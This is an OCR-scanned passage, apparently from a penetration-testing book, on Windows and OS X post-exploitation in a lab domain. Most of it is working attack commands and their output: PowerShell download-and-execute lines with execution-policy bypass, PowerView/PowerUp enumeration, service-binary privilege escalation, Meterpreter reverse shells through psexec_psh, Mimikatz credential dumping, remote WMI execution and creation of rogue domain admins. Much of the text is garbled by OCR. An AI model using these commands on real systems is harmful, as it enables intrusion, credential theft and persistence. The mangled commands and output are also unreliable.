the domain user “domainA” who is a domain administrator: 

o Powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch( 
Invoke-UserHunter -UserName "domainA" 


C-vUters^PomrshoLLexe -NoP -NonI -Exec Bypass IEX (New-Object 
-UssrHunter -UserNane "donainA" I 

El*] Running iJsei'Huntei* on dona in uinV. hacker, test lab with delay 

[*3 Using target user "donainft" *** 

1*3 total nunber of hosts i *2^ 

1 + 1 target user domainA" has a session on win?.hacker,testlah 
[ + ] Target user "domainA" logged into win?, hacker, test lab <192 
E + 3 Target user "domainA" logged into win?,hacker. test lab < 192 H 


• Finding Open Shares: Once on a domain machine, you want to poke around to 
what’s near you and see what risers are sharing. This will download PowerView and 
search AD for hostnames and query those machines for open shares. From the output 
below, it looks like we have access to the admin shares and full c drives of three 
different hosts. 

o Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New- 
Object 

Net. WebClient).DowrdoadSfiing('https://raw.gi thubusercontent.com/ch< 
"Invoke-ShareFinder -ExcludelPC -ExcludePrint -CheckShareAccess | 
Out-File -Encoding ascii found_shares.txt" 
o And when we read found_shares.txt 
o >type found_shares.txt 

Wwin7_123.hacker.testlab\ADMIN$ - Remote 

Admin 

Wwin7_l23.hacker.testlab\C$ - Default share 

Wwin7_123 .hacker.testlabMJsers 

Wwin7_125.hacker.testlab\ADMIN$ - Remote 

Admin 

Wwin7_l25.hacker.testlab\C$ - Default share 

Wwin8_l00.hacker.testlab\ADMIN$ - Remote 

Admin 

Wwin8_l00.hacker.testlab\C$ - Default share 

Wwin8_100.hacker.testlab\Users 

Wwin8 10 Thacker.testlab\ADMIN$ - Remote 






Admin 

Wwin8_l 01.hacker.testlab\C$ - Default share 

• What if you want to see all the open shares on your network? Generally open shares 
or files shares have tons of goodies stored in them These can include configuration 
files, passwords, sensitive documents and more. Invoke-Netview, part of the 
PowerTools suite, is a tool that queries the domain for all hosts, and retrieves open 
shares, sessions, and users that are logged on for each host. Original functionality was 
implemented in the netview.exe tool released by Rob Fuller (@mubix). Note that this 
script takes a long time as it tries to connect to every share and is very loud on the 
network. 

o Powershell.exe -exec bypass IEX "(New-Object 

Net. WebClient).DownloadString(‘https://raw.githubusercontent.com/ch 
Invoke-Netview 

• Another great module of PowerView is the ability to get a list of all Active 
Directory users and the associated information with their accounts. 

o Powershell.exe -exec bypass IEX "(New-Object 

Net. WebClient).DownloadString(‘https://raw.githubusercontent.com/ch 
Get-UserProperties -Properties name,memberof,description,info" 

• Automate post exploitation information gathering? Try Nishang’s Get- 
Information.ps 1 

o Powershell.exe -exec bypass IEX "(New-Object 

Net.WebClient).DownloadString('https://raw.githubusercontent.com/ch( 
Information.ps 1 ');Get-Information" 



The command completed successfully. 


I Account Policy: 

[Force user logoff how long after tine expires?: Never 

Minimum password age <days>: 1 

tlaxinun password age <days>: 42 

flininun password length: 7 

Length of password history Maintained: 24 

Lockout threshold: Never 

Lockout duration <ninutes>: 30 

[Lockout observation window <ninutes>: 30 

Computer role: PRIMARY 

The connand conpleted successfully. 


Local users: 

User accounts for \\WIN~BLN6U6ERSUN 


|adnin_account Administrator bobsnith 

uonainadnin Guest krbtgt 

pnartian 

The connand conpleted successfully. 


Local Groups: 

Aliases for \\WIN-BLN6U6ERSUN 


•Account Operators 
["Administrators 

"A1lowed RODC Password Replication Group 

"Backup Operators 

kCert Publishers 

"Certificate Service DCOM Access 

"Cryptographic Operators 

"Denied RODC Password Replication Group 

"Distributed COM Users 

["DnsAdnins 

kEvent Log Readers 

kGuests 

kllS.IUSRS 

"Inconing Forest Trust Builders 

"Network Configuration Operators 

•Performance Log Users 

^•Performance Monitor Users 

"Pre-Windows 2000 Compatible Access 

♦Print Operators 

"RAS and IAS Servers 

"Remote Desktop Users 

"Replicator 

"Server Operators 

"Terminal Server License Servers 

"Users 

"Windows Authorization Access Group 
(The connand conpleted successfully. 


ULAN Info: 

The following connand was not found: wlan show all. 

K?:MJser9\nishang 2>Powershcll -ExecutionPolicy bypass -file Get-Infornation.psl 


Other Common Non-Powers he 11 Post Exploitation Commands: 

• Get Local Windows Accounts 

o wmic useraccount get /ALL /format:csv 

• Find Domain Controllers: 

o nltest /DCLIST: [Domain] 

• List Domain Admins and Local Admins: 

o net group “Domain Admins” /domain 
o net localgroup administrators /DOMAIN 


Domain Trusts 

HarmJOy has been doing great work this year. One thing that he has been diving into is Windows 
domain trusts. From an offensive perspective, after compromising the first host, you should 
understand the type of infrastructure they use. This means that in large environments, the Active 
Directory environment may have multiple relationships with different Domains. {12} 


We used PowerView throughout the book for the multitude of tools that are incorporated in this 
PowerShell toolbag. One of these tools that helps infiltrate large organization is called Invoke- 





MapDomainTrusts. Running this command will show the relationship between the different domain 
trusts. 


For example: 

• Powershell.exe -exec bypass IEX "(New-Object 

Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
Invoke-MapDomainTrusts | Export-CSV -NoTypelnformation trusts.csv" 

The output: 

hacker.testlab,it.hacker.testlab,ParentChild,BiDirectional 
hacker.testlab,corp.hacker.testlab,ParentChild,BiDirectional 
corp.hacker.testlab,corp.alice.com,External,Inbound 
it.hacker.testlab,hacker.testlab,ParentChild, Bidirectional 
engineering.hacker.testlab,hacker.testlab,ParentChild, Bidirectional 
rockets. testlab,product.rockets.testlab,ParentChild, Bidirectional 
rockets. testlab,it.rockets.testlab,ParentChild, Bidirectional 


To find information about members of a given local group: 

• Powershell.exe -exec bypass IEX "(New-Object 

Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
Get-NetLocalGroup -HostName it.rockets.testlab. 


Since this all comes from harmjOy, I would highly recommend you read: 
http://www.harmjOy.net/blog/redteaming/domain-trusts-why-you-should-care/ 


Group Policy Preferences: 


In the last book, a great and inexpensive “domain user to local admin privilege escalation trick” was 
through Group Policy Preferences. Group Policy Preferences vulnerabilities have been patched in the 
newest Windows version, but it should be one of the first things to check. 


Group Policy Preferences is a powerful feature to make a sysadmin’s life much easier by deploying 
GPO settings within the whole environment. One of the features is that you can create/update local 
admin accounts to all the hosts within the domain. Why would someone use this feature? It might be 
because they want to push a new administrative local user onto every host or update the password for 
a local account on every machine (more common than you might think). Once this setting is configured 
and GPOs are updated, all workstations will now have this account. The problem is that this 
information (username/password of local admin account) has to be stored somewhere and in GPP’s 
case they are stored on the domain and readable by any AD user account. Even worse was that the 
encrypted AES key protecting these passwords was posted on Microsoft’s site, allowing anyone to 
reverse the passwords. {13} 



If you are on a host that is authenticated to the network with any domain user, you can use the 
Metasploit modules with the following: 

• use post/windows/gather/credentials/gpp 

• set SESSION [Session # of your shell] 

• exploit 


This would get you a lot of easy cheap local administrative credentials, but after the Windows patch, 
I don’t see this as often. 

• https://github.com/rapid7/metasploit- 
framework/blob/master/modules/post/ windows/gather/credentials/gpp.rb 

• https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Ge 
GPPPassword.ps 1 

Or if you don’t have a shell, just mount: \\[Domain Controller]\SYSVOL\[Domain]\Policies, look for 
the Groups.xml file, and decrypt the hash using: 

http://esec-pentest.sogeti.com/public/files/gpprefdecrypt.py . 


OS X Enumeration 

t https://github.com/Yelp/osxcollector XOS X): 

OS X and Linux detailed post exploitation guides are listed below. In addition to those guides, I 
wanted to integrate how incident response techniques can support penetration testers. Yelp created a 
tool called OSXCollector, which is a forensic evidence collection and analysis toolkit for OS X. 
This tool is used to speed up incidents and investigations on compromised Macs. As a penetration 
tester, we can use these same tools to perform our information gathering automation. Let’s see this in 
action: 


• curl "https://codeload.github.com/Yelp/osxcollector/zip/master" -o osxcollector.zip 

• unzip osxcollector.zip 

• cd osxcollector-master/osxcollector 

• sudo python osxcollector.py 


admins-MacBook-Pro:osxcollect-2015_04_22-23_28_08 admin$ Is -alh 
total 319408 


drwxr-xr-x 

16 

admin 

staff 

544B 

Apr 

22 

23 

45 . 

drwxr-xr-x@ 

7 

admin 

staff 

2386 

Apr 

22 

23 

39 .. 

-rw-r—r— 

1 

admin 

staff 

3.4K 

Apr 

22 

23 

39 LKDC-setup.log 

-rw-r—r— 

1 

admin 

staff 

347B 

Apr 

22 

23 

39 VMware Fusion Services.log 

-rw-r—r— 

1 

admin 

staff 

155M 

Apr 

22 

23 

39 OSXCOllect-2015_04_22-23_28_08.j son 

-rw-r—r— 

1 

admin 

staff 

0B 

Apr 

22 

23 

39 stackshot-syms.log 

-rw-r—r— 

1 

admin 

staff 

0B 

Apr 

22 

23 

39 stackshot.log 

-rw-r—r— 

1 

admin 

staff 

264K 

Apr 

22 

23 

39 system.log 

-rw-r—r— 

1 

admin 

staff 

6.5K 

Apr 

22 

23 

39 system.log.B.gz 

-rw-r—r— 

1 

admin 

staff 

35K 

Apr 

22 

23 

39 system.log.l.gz 

-rw-r—r— 

1 

admin 

staff 

55K 

Apr 

22 

23 

39 system.log.2.gz 

-rw-r—r— 

1 

admin 

staff 

22K 

Apr 

2? 

23 

39 system.log.3.gz 

-rw-r—r— 

1 

admin 

staff 

43K 

Apr 

2? 

23 

39 system.log.4.gz 

-rw-r—r— 

1 

admin 

staff 

37K 

Apr 

22 

23 

39 system.log.5.gz 

-rw-r—r— 

1 

admin 

staff 

47K 

Apr 

22 

23 

39 system.log.6.gz 

-rw-r—r— 

1 

admin 

staff 

47K 

Apr 

22 

23 

39 system.log.7.gz 


OSXCollector Output 






After the OSXCollector finishes, a tar gz file is created with the date timestamp. Extracting the tar gz 
file (tar xzvf osxcollect-*.tar.gz), we see a file output similar to above. These contain all the system 
log files, but more importantly is the j son file. What is in the json file: 

• Full browser information (history, cookies, login data, etc) 

• Information about the LaunchAgents, LaunchDaemons, ScriptingAdditions, 
Startupltems and other login items 

• Information from Mail and more 

• User accounts 

• For full detail see: 
https://github.com/Yelp/osxcollector 

Why is this important to a red team? Inside this json files I have found passwords, session cookies, 
sensitive web browsing data, certificate data, and much more. Fuckily, you can do most of this 
investigation offline and reuse cookies to log into sensitive websites. 


Additional Post Exploitation Tips 


Rob Fuller (Mubix) and room362.com have very comprehensive lists on additional Post Exploitation 
Post Exploitation Fists fromRoom362.com: {14} 

• Finux/Unix/BSD Post Exploitation: http://bit.lv/pq.TxA5 

• Windows Post Exploitation: http://bit.lv/1 em7gvG 

• OSX Post Exploitation: http: //bit, lv/1 kVTIMf 

• Obscure System's Post Exploitation: http://bit.lv/18dvL0I 

• Metasploit Post Exploitation: http: //bit.lv/JpJ1TR 


Privilege Escalation: 


If you end up in an environment with restrictive users, you might have issues moving laterally or 
performing elevated attacks. Without being an administrative user on a host, you are limited in pulling 
hashes, installing software, changing firewall rules, modifying the registry and more. I have dedicated 
a quick section for getting from a regular user to a local administrator in this Zero to Hero section. 


Zero to Hero - Windows: 

After the initial compromise, one of the biggest issues is moving from a regular user to an 
administrative user. With a regular user, you lack the ability to make modifications to the registry, 
install software, bypassUAC, pull hashes, and most of all become system. 

In the prior chapter, we talked about looking at open shares for password lists or for configuration 
files. In this section, we will discuss how to look for vulnerabilities and issues on the host system to 
get to system. 


As a member of the users group with no administrative privileges, we need to look for 









misconfigurations. What are the things we might look for? 


Option 1: 

The first common privilege escalation I see are services files that have misconfigured privileges. We 
know that services files execute at bootup and call an executable to run in the background. For 
example, think of Java updater. This runs every time you boot up and checks Oracle to see if you have 
the latest version of Java. It is always running and generally running at a privileged local account. 


This means if an executable that is called by a service is writeable by a limited user, we can replace 
it with a file we created, which will allow our new file to execute as system every time the service 
starts. 


Luckily for us, harmjOy created a tool called PowerUp to look for these issues: 
f https://gjthub.com/Veil-Framework/PowerTools/tree/master/PowerUp L 


To run PowerUp, we will use the standard PowerShell command to download and execute the 
Invoke-Allchecks: 

• powershell -Version 2 -nop -exec bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
Invoke-AllChecks 


l : \UserS\t tit at t uunt > pflHfirshell Airsion 2 -riufi -tm bypass IEK (Nt* Object ket.WbCiient; .CwkddiUii^ "https 
iwork/P- m\ iTMls/naster/PowerUp/PowerUp . psl'); Invoke ■ AllChecks 

[ k ] Awning IWflkl-AllCtotkS 

[ T ] Checking for unquoted service paths... 

[*] Use 'Write'■UHrftddSirviciBiniry' to abuse 

[*] Unquoted service path: DACoreService - C:\Progras Files Ail 1 stwt\C4r*\JUC4rt,«x* 

[*] Chicking urviti ixicutibif pini»l4nt..i 
[■] Use ‘Write ierviteEHE ■ Serviced SVC' to abuse 

[*] Vulnerable service executable: oaniserv ■ "G:\PreptP HMlftr Pro\Owl^+l» M 

[ T ] Checking service permissions... 

[ B ] Checking for unattended Mall fills... 

[*] Checking MU for potentially hijackable .dll locations.,. 

[t] Hijackeble -dll path; C:\Prflpii Fil*s\Finjerprint Hiiiifir Pw\ 

[*] Htjieklbli ,411 pith: C^\Progr*iiDatj\ReadyApp 
[*] Checking for AlwayjInstallElevated registry key... 







PowerUp Example 


We see that the service omniserv is vulnerable to the Write-ServiceEXE issue. How can we co nfi rm 
that we have the ability to write to C:\ProgramFiles\Fingerprint Manager Pro\OmniServ.exe? 


There is a default Windows program called icacls to view file permissions. For example, running 
icacls on this file, we would see an output of: 

• icacls "C:\ProgramFiles\FingerprintManager Pro\OmniServ.exe" 

C:\Program Files\Fingerprint Manager Pro\OmniServ.exe 

Everyone: (I) (F) 

NT AUTHORITY\SYSTEM:(I)(F) 

BUILTIN\Adrninistrators:(I)(F) 

BUILTINMJsers: (I)(RX) 
laptop\testaccount: (I)(F) 

APPLICATION PACKAGE AUTHORITY\ALL APPLICATION 
PACKAGES :(I)(RX) 

For this file, we can see that Everyone has (F) or full access to modify this executable. If we can 
replace this service file with another service executable, we can potentially take advantage of system 
privileges. 

• powershell -Version 2 -nop -exec bypass IEX (New-Object 
Net. WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
Write-ServiceEXE -ServiceName omniserv -Username newaccount -Password 
Asdfasdfl -Verbose 


C:\!hipj\t«tKeount)paiinhill -Ytriion 2 -iwp- rixtt bypHi iejs 

n™rk/^cr[colWmJ!itfr/hMDr^/PiMrLJp.pil , )[ Write >£trviciEJl! ■iurviccNane ainistrv ■Uiernm nwiccDitnt 'burord 
Altflldfl ■VtPtKJSS 

yfftfiOSEl fllikin£ up filei\Fin^irpriht toiler to Fili4\Fingfrsrlnt FUlUfir 

[*] einsry for Hnrici 'mim* to cr^te use * 1 'wwcfowt i todMi 1 written to ’C:\Prefrii FilesVfingRnppjnt 
Miniger Pro\OwiSfPv.exe 'rme 1 
C:\yieP5\tottdLfrjunUnel Jtap tafliJNv 
SyUH Rrrgr * hfi «^nrid r 

kf.tu is denied, 


Vulnerable Service File 


If possible, you can try to stop and start the service, but in this case, due to being a limited user, we 
need to wait for a reboot to occur. To force a reboot, we can push this command: 

• shutdown -r -f -t 0 


After a reboot or an administrative account starting and stopping of the service, a new account called 
“newaccount” and Password of “Asdfasdfl” is created with Administrative Privileges. Just log back 
in and you are now a local admin. 


H Administrator: Command Prompt 


C:\windows\system32>net stop omniserv 

The Fingerprint Manager Pro Service service is stopping. 

The Fingerprint Manager Pro Service service was stopped successfully. 

C:\windows\system32>net start omniserv 

The Fingerprint Manager Pro Service service is starting. 

The Fingerprint Manager Pro Service service was started successfully. 


C:\windows\system32> 


< 




Local Users. 

Name Full Name 

A 

0 Users 

Administrator 


Q Groups 

J*. Guest 
helpdesk 

A- newaccount 




General Member Of Profile 
Member of: 


Administrators 

Users 


PowerUp Privilege Escalation 


Removing your tracks is always important, so we need to make sure we set everything back to it’s 
original state after we get our admin account. Luckily again, harmjOy created a restore function to put 
the original executable back: 

• powershell -Version 2 -nop -exec bypass IEX (New-Object 
Net. WebClient).DownloadString('https://raw.githubusercontent.com/Veil- 
Framework/PowerTools/master/PowerUp/PowerUp.ps L); Restore-ServiceEXE - 
ServiceName omniserv 

o Restoring up 'C:\Program Files\Fingerprint Manager 
Pro\OmniServ.exe.bak' to 'C:\Program Files\Fingerprint Manager 
Pr o\Omni S er v. exe' 

o Removing backup binary 'C:\Program FilesVFingerprint Manager 
Pro\OmniServ.exe.bak' 


Option 2: 

Metasploit has released a local exploitation module called Windows Service Trusted Path Privilege 
Escalation. {15} 


The concept of this vulnerability is to look for services that have unquoted paths for files it executes. 
In other words, if a service calls an executable like C:\Program FilesVDemo File\Demo.exe and it 
doesn’t properly quote the full path name, we can take advantage of this. If we look at the folder name 
from our example, \Demo File\, we see that there is a space between Demo and File. In Windows, 
this can either be treated as “\Demo File\” or if there happened to be a Demo.exe file in “C:\Program 













FilesV’, it would execute the command “\Demo.exe File\”. To visualize this issue, let’s look at two 
strings. The quoted string in the picture below is from the omniserv service from our prior example. 
We see that the BINARY PATH NAME has quotes around the executable path. However, the 
service name DACoreService calls a file that is not quoted. This is where the problem stems from. 


C:\Users\testaccount\Desktop>sc qc omniserv 

[SC] QueryServiceConfig SUCCESS 

SFRVICE_NAME: omniserv 


TYPE 

10 WIN32_OWN_PROCESS 

START_TYPE 

2 AUTO_START 

ERROR_CONTROL 

1 NORMAL 

BINARY_PATH_NAME 

■’C:\Program F i les\F i ngerpr int Manager Pro\OmniServ.exe'' 

LOAD_ORDER_GRCMJP 

COM Infrastructure 

TAG 

0 

DISPLAY_NAME 

Fingerprint Manager Pro Service 

DEPENDENCIES 

rpcss 

SERVICE_START_NAME 

LocalSystem 

C:\Users\testaccount\Desktop>sc qc DACoreService 

[SC] QueryServiceConfig SUCCESS 

SERVICE_NAME: DACoreService 


TYPE 

10 WIN32_OWN_PROCESS 

START_TYPE 

2 AUTO_START 

ERROR_CONTROL 

1 NORMAL 

BINARY_PATH_NAME 

C:\Program Files (x86)\Dragon Assistant\Core\DACore.exe 

LOAD_ORDE R_GROUP 


TAG 

0 

DISPLAY_NAME 

Dragon Assistant Core 

DEPENDENCIES 

rpcss 

SERVICE START NAME 

LocalSvstem 


Unquoted Vulnerability 


In this example, C:\ProgramFiles (x86)\Dragon Assistant\Core\DACore.exe, we could create a file at 
C:\Program Files (x86)\Dragon.exe and the service will treat the File Dragon.exe as input to the 
executable. To execute a file as a potential system user, we just need to create a service executable in 
the path. Let’s walk through the whole process. 


First, we need to identify if we have any Trusted Path Issues. From the Invoke-Allchecks above, we 
see that DACoreService is vulnerable to the unquoted service path vulnerability. 


• [*] Checking for unquoted service paths... 

• [*] Use ' Write-UserAddServiceBinary' to abuse 

• [+] Unquoted service path: DACoreService - C:\Program Files (x86)\Dragon 
Assistant\Core\DACore.exe 

Let’s take advantage of it. Again, we will call: 

• powershell -Version 2 -nop -exec bypass IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
Write-UserAddServiceBinary -ServiceName DACoreService -Path Dragon.exe 


Now, if you have the proper privileges, move Dragon.exe to C:\Program Files (x86)\. When we get a 
reboot or when an admin stops and starts the DACoreService service, we will get a new user account 
(John) as part of the Administrators Group. 


Reboot the host: 





• shutdown -r -f -t 0 


C:\windows\system32>net stop DACoreService 
the Dragon Assistant Core service is stopping. 

The Dragon Assistant Core service was stopped successfully. 


lusrmgr - [Local Users and Groups (Lo... 
File Action View Help 


_ □ 


A- Local Users i 

Name Full Name 

j Users 

Administrator 

1-3 Groups 

^ Guest 


% helpdesk 


$ john 


Actions 


Users 

More... ► 

john A 


r I 


General 


john Properties 

Member Of Profile 


Member of: 


Users 


PowerUp - Account Creation 


Zero To Hero - Linux: 


On Linux, we run into the same issues. We are looking for files that are world-writable, SUID/GUID 
files owned by root, and misconfigurations. Two different tools to look for these privileges are unix- 
privesc-check and LinEnum 

• https://code.google.eom/p/unix-privesc-check/source/cheekout 

• https: / / github .com/ rebootuser/T a nRnum 

Move this software over to the victim host and run them. 

Lastly, for a good list of Linux/Unix based privilege escalation exploits: 

• https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack 


With Any Local Administrative or Domain Admin Account: 


Hopefully, in the prior chapter, you were able to gain access to a local administrative account that 
works on all of the users’ machines or maybe even a domain admin account. What are some of the 





























next steps for your newly-found credentials? This section is dedicated to continually owning the 
network. 


Owning The Network With Credentials And Psexec: 


In my last book, once you had a username and password, if you wanted to get another Meterpreter 
shell on another host, you had to use psexec. The problem was that the default payload would trigger 
most AV systems, so we had to create a Meterpreter payload first using Veil and attaching that. Let’s 
go through that first to see what we used to do: 

• Go to Veil located in/opt/Veil and execute ./Veil 

• list and use payload 

• set your LHOST and LPORT 

• generate using pyinstaller 

• Now go to metasploit, use psexec with the custom payload 

o msfconsole 

o use exploit/windows/smb/psexec 

o set PAYLOAD windows/meterpreter/reversehttps 

o set LHOST [IP of My Box] 

o set LPORT 443 

o set SMBUser TestAccount 

o set SMBPass MyPassword 

o set SMBDomain fakeDomain 

o set EXE::Custom/root/veil-output/compiled/veil_file.exe 
o set RHOST [IP of Remote Host] 


This worked great in the past and we were able to get around AV Additionally, I have seen some AV 
in the past year start picking up on python executable payloads. As seen throughout the book, this is 
definitely is a cat and mouse game. That is what makes penetration testing so much fun. 


This is where psexec_psh comes into play. Just like psexec, what psexec_psh does is mimic the 
sysinternals tool psexec to log into the victim host and execute a payload. What psexec_psh does 
differently is use PowerShell encoded commands to mimic the old psexec. You will get back a 
Meterpreter shell, but this time nothing will touch disk at all. No need to create a custom payload to 
evade AV. 


• use exploit/windows/smb/psexec_psh 

• set RHOST 172.16.151.202 

• set SMBUser lab 

• set SMBPass '!Asdfasdfasdfl!' 

• set SMBDomain hacker.testlab 

• set LHOST 172.16.151.141 



• set PAYLOAD windows/meterpreter/reversehttps 

• exploit 


msf exploit{ 
msf exploit! ) 

RHOST => 172.16.151.202 
msf exploit! ) 

SMBUser => lab 
msf exploit! psh) 


«) > 


use exploit/wir>dows/smb/psexec_psh 
set RHOST 172.16.151.202 


> set SMBUser lab 


set SMBPass ' !Asdfasdfasdfl!' 

SMBPass => !Asdfasdfasdf1! 

| msf exploit! si xer psh) > set SMBDomain hacker.testlab 
SMBOomain => hacker.testlab 

| msf exploit (psexn psh) > set LHOST 172.16.151.141 
LHOST => 172.16.151.141 

| msf exploit! psh) > set PAYLOAD windows/meterpreter/reverse_https 

PAYLOAD => windows/meterpreter/reverse_https 
msf exploit (psexecpsh) > exploit 


•] Started HTTPS reverse handler on https://0.0.0.0:8443/ 

*] 172.16.151.202:445 - Executing the payload... 

172.16.151.202:445 - Service start timed out, OK if running a command or n| 


+1 


172.16.151.202:49196 Request receiv^jmr//fflaT71 
172.16.151.202:49196 Staging connection for/target /fCj<h .received 
Meterpreter session 1 opened (172.1p.l51\141:8443 


meterpreter > 


kL-TL 


1F2.16 


n 


Q51.fe02 


□u 


psexec psh 


Now moving laterally through the network becomes that much easier and that much more silent. 

Once we have a successful Meterpreter session, we will interact with that session with the command: 
• sessions -i [session number] 


One of the common next steps is to run Mimikatz against the system. If you run into a system that is a 
64-bit system, you will have to first migrate into a 64-bit process. The reason I want to utilize a 64- 
bit process is because that is the only way Mimikatz will be able to look for the clear text passwords 
in 64-bit systems. If it is a 32-bit system, you can still migrate into another process if needed, but it 
might not be necessary. 

To list all of the processes, we will use the "ps" command. To migrate, we will use the command 
"migrate [pid]". In the example below, we identified Notepad running as a 64-bit process and 
migrated into it. 

• ps 

• migrate [pid of a x86_64 process] 


You might need to become "system" before doing any of these commands. You can do this by issuing 
the following command: 

• getsystem 

• If you get denied and are a local admin, see the Bypass UAC section. 


Once migrated and running as system, we want to load Mimikatz and type the command kerberos (or 




you can use wdigest). This should give us the clear text passwords of the current users logged in. 

• kerberos 

• wdigest 


msf exploit( ) > sessions -i 5 

[*] Starting interaction with 5... 


meterpreter > ps 


s (x86)\Google\Ch rome\Applic ation\ch rome.exe 
12668 70S conhost.exe 

em32\conhost.exe 
12864 10800 chrome.exe 

s (x86)\Google\Ch rome\Applic ation\ch rome.exe 
13036 3040 notepad.exe 

em32\notepad.exe 


x86_64 1 

x86 1 

x86 64 1 


meteroreter > migrate 3040 
[*] Migrating from 10760 to 3040... 
[*] Migration completed successfully. 
meteroreter > load mimikatz 
Loading extension mimikatz...success. 
meterpreter > kerberos | 

[!] Not currently running as SYSTEM 
Attempting to getprivs 
Got SeDebugPrivilege 
Retrieving kerberos credentials 
kerberos credentials 


i+] 

[*i 


AuthID 


Package 


Domain 


User 


Passwo rd 


0;47757 NTLM 
|0;997 Negotiate 
|0; 182290 Kerberos 
0;1825757 Kerberos 


NT AUTHORITY 

fakeDomain 

fakeDomain 


LOCAL SERVICE 

TestAccount 

TestAccount2 


MyPasswo rd 
MyPasswo rd 2 


Mimikatz 


We now have another account and password to utilize. In addition to Mimikatz, there are also other 
post modules in Metasploit that you might want to look into, such as Incognito{16}and 
Smart HashDump {17}. These should get you enough access on this host for the time being. 


Psexec Commands Across Multiple IPS (Kali Linux) 


Since we have credentials that have local administrative access, there are times where I don't want to 
compromise every host, and instead, just run commands on these hosts. For example, some commands 
you may want to run on all hosts are: 

• net group "Domain Admins" /domain (list all Domain Admins on servers) 

• qwinsta (list about user session information) 

• Create Additional Administrative Accounts on All Hosts 

o net user username password /ADD /DOMAIN 
o net group "Domain Admins" username /ADD /DOMAIN 
o net localgroup Administrators username /ADD 


Royce Davis took the original psexec code and modified it so it does not upload any binaries, but 
achieves command line remote code execution in memory. This allows you to avoid AV detection and 








run threaded commands on multiple systems. I will show you a quick example: {18} 

• use auxiliary/admin/smb/psexec_command 

• set RHOSTS [IP or IP Range] 

• set SMBDomain [Domain Info] 

• set SMBPass [Password] 

• set SMBUser [User] 

• set COMMAND [command you want to run at the command line] 

• exploit 



l£I auxi iTaryT^^^^^^^MT^Tis^auxi Liary/aamin/smD/psexec_commana 
isf auxiliary > set R.HQSTS 172.16.139.196 

GHOSTS => 172.16.139.196 


isf auxiliary > set SMBDomain corp.fakedomain. test lab 


>MBDomein corp.fakedomain.testlab 


isf auxiliary 
MBPass => !Ad minlAccount! 
isf auxiUary[^^^mH|} 
JMBUser -> Adm in Account 
isf auxiliary 
OMMAND => qwi nsta 
isf auxiliary 


> set SMBPass !AdminlAccount! 

> set SMBUser Admin Account 

> set COMMAND qwinsta 

> show options 


lodule opt ions ( auxilia ry/adm in/ smb / psexec^command ) ; 


Name 

Current Setting 

Required 

Description 

COMMAND 

qwinsta 

yes 

The 

command you want i 

RHOSTS 

172.16,139,196 

yes 

The 

target address rar 

RPORT 

445 

yes 

The 

Target port 

SMBDomain 

corp.fakedomain.test lab 

no 

The 

Windows domain to 

SMBPass 

■AdminlAccount! 

no 

The 

password for the ! 

SMBSHARE 

c$ 

yes 

The 

name of a writeab' 

SMBUser 

Admin Account 

no 

The 

username to authei 

THREADS 

1 

yes 

The 

number of concurn 

WINPATH 

WINDOWS 

yes 

The 

name of the remote 


isf auxiliary> exploit 


*] 
+ J 


172,16,139.196:445 - Executing the command... 
172,16,139.196:445 - Getting the command output,-, 

+ 1 172,16.139.196:445 ■ Command completed successfully! Output 
SESSIONNAME USERNAME ID STATE TYPE 

services Q Disc 

console administrator 1 Active 


DE 


*1 

*] 

*1 

11 


172.16.139.196:445 ■ Executing cleanup... 
172.16.139.196:445 - Cleanup was successful 
Scanned 1 of 1 hosts [100% complete) 
Auxiliary ncdule execution completed 


psexec_command 































In the Pregame chapter, during the Setting Up Your Box phase, you had the option of enabling logging 
for Metasploit. This is one area where logging can be very helpful. If you want to execute code on /24 
network or larger, the output is going to be pretty extensive. If you need to parse through it, it is much 
easier to have Metasploit log the traffic and grep that file. In the previous command, I was able to run 
the qwinsta command on every host and link IPs with usernames. If I have a list of IT administrators, I 
can directly attack their box instead of compromising all the hosts on the network. 


Move Laterally With WMI (windows) 


A better option to move laterally is using WMI or Windows Management Instrumentation. WMI is 
used to manage systems and is installed by default on all new Windows operating systems. We can 
take advantage of WMI to remotely execute commands on other systems on which we have access. 
Since we have compromised our victim and pulled hashes, we can now find an account with elevated 
privileges and run commands on remote hosts using those credentials. In the example below, we 
compromised a user “testuserl” that has access to another host. We can use WMI to execute Mimikatz 
remotely, write it out to a file in the public folder, and read that file: 

• wmic /USER:"hacker\testuserl" /PASSWORD:"! Asdfasdfasdfl!" 
/NODE: 172.16.151.201 process call create "powershell.exe -exec bypass IEX (New- 
Object 

Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSplc 
Mimikatz.psI'); Invoke-Mimikatz-DumpCreds | Out-File C:\\Users\\public\\a.txt" 

• dir Wwin8\c$\Users\Public\ 

• type Wwin8\c$\Users\Public\a.txt 

• del Wwin8\c$\Users\Public\a.txt 

As you can see from the image below, we are currently on the host win7. We execute a wmic call to 
remotely execute a Power Shell script against the host win8 to run Mimikatz and dump it out to a file. 
Next, we will read that file from our win7 host. 


C:\Use rs\testuserl>hostname 

hostname 

win7 


C:\Use rsNtestuse rls 


ic /USER:"hacker\testuserl" /PASSWORD:"!Asdfasdfasdfl!" /N0DE:1 
bypass IEX (New-Object Net.WebClient).DownloadString!'https://raw.githubuserconter 
nikatz.psl*); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt" 

«mic /USER:“hackerNtestuserl" /PASSWORD:"!Asdfasdfasdfl!“ /NODE:172.16.151.201 proce 
iject Net .WebClient).DownloadStrlngl'https://raw.githubuse rcontent.com/cheetz/PowerS 
-Mimikatz -DumpCreds I Out-File C:\\Users\\public\\a.txt"I 


Executing (Win32_Process)->Create() 
Method execution successful. 

Out Parameters: 

instance of _PARAMETERS 

{ 

Processld = 1328; 
RetumValue = 8; 

}; 


C:\Users\testuserl>type Wwin8\c$\User 
type Wwin8\c$\Users\Public\a.txt 


.#####. mimikatz 2.0 alpha (x64) ri 



i May 20 20ll 0£U56;48)L 


rv 


.## ~ ##. 

## / \ ## /• * • “the quieter you become, t 

